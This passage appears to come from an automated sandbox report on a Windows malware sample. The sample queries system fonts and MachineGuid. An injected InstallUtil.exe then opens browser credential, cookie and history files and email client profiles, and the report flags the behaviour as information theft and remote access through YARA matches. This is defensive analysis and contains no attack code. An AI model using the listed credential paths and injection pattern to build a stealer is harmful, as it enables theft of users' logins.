                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    Source: Yara match | File source: 00000005.00000002.2903836633.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0.2.pbCN4g6sN5.exe.35df6d0.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.pbCN4g6sN5.exe.35df6d0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000000.00000002.2382308673.0000000003559000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000005.00000002.2900986537.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.2382308673.00000000035DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: pbCN4g6sN5.exe PID: 5696, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 7492, type: MEMORYSTR
                    Source: Yara match | File source: 0.2.pbCN4g6sN5.exe.35df6d0.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.pbCN4g6sN5.exe.35df6d0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000000.00000002.2382308673.0000000003559000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000005.00000002.2900986537.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.2382308673.00000000035DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: pbCN4g6sN5.exe PID: 5696, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 7492, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: Yara match | File source: 0.2.pbCN4g6sN5.exe.35df6d0.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.pbCN4g6sN5.exe.35df6d0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000000.00000002.2382308673.0000000003559000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000005.00000002.2900986537.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000005.00000002.2903836633.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.2382308673.00000000035DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: pbCN4g6sN5.exe PID: 5696, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 7492, type: MEMORYSTR

                    Remote Access Functionality

                    Source: Yara match | File source: 00000005.00000002.2903836633.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0.2.pbCN4g6sN5.exe.35df6d0.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.pbCN4g6sN5.exe.35df6d0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000000.00000002.2382308673.0000000003559000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000005.00000002.2900986537.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.2382308673.00000000035DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: pbCN4g6sN5.exe PID: 5696, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 7492, type: MEMORYSTR
                    Source: Yara match | File source: 0.2.pbCN4g6sN5.exe.35df6d0.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.pbCN4g6sN5.exe.35df6d0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000000.00000002.2382308673.0000000003559000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000005.00000002.2900986537.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
